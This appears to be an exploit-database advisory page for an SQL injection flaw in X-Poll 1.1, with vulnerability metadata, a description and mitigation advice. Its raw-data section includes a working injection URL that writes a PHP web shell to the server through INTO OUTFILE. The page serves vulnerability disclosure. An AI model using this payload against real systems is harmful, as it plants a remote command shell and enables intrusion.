header-logo
Suggest Exploit
vendor:
X-Poll
by:
SecurityFocus
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: X-Poll
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: YES
Related CWE: N/A
CPE: a:x-poll:x-poll
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

X-Poll SQL Injection Vulnerability

X-Poll is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in a way that would allow an attacker to modify the logic of the executed query.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/19236/info

X-Poll is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. 

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

X-Poll 1.10 is vulnerable to this issue.

http://www.example.com/poll/top.php?poll=' AND 0 UNION SELECT 0, '%3C%3Fsystem%28%24_GET%5B%22c%22%5D%29%3B%3F%3E' , 1, 2, 3, 4, 5, 6, 7, 8,'' INTO
OUTFILE '/usr/webserver/public_htm/rshell.php

Navigation

Suggest Exploit

Services By CQR